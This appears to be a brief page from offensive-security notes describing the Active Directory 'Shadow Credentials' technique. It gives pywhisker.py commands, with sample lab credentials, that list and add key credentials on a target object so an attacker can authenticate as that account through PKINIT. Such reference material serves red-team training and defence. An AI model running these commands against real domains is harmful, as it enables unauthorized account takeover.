Shadow Credentials

It is possible to add “Key Credentials” to the attribute msDS-KeyCredentialLinkof the target user/computer object and then perform Kerberos authentication as that account using PKINIT.

python3 pywhisker.py -d offsec.local -u cub3 -p 'Passw0rd!' --target offsec.local --action list

python3 pywhisker.py -d offsec.local -u cub3 -p 'Passw0rd!' --target offsec.local --action add

Shadow Credentials: Abusing Key Trust Account Mapping for TakeoverMedium

Shadow Credentials - HackTricksbook.hacktricks.xyz

PreviousAttacking Authentication NextTargeted Kerberoasting

Last updated 1 year ago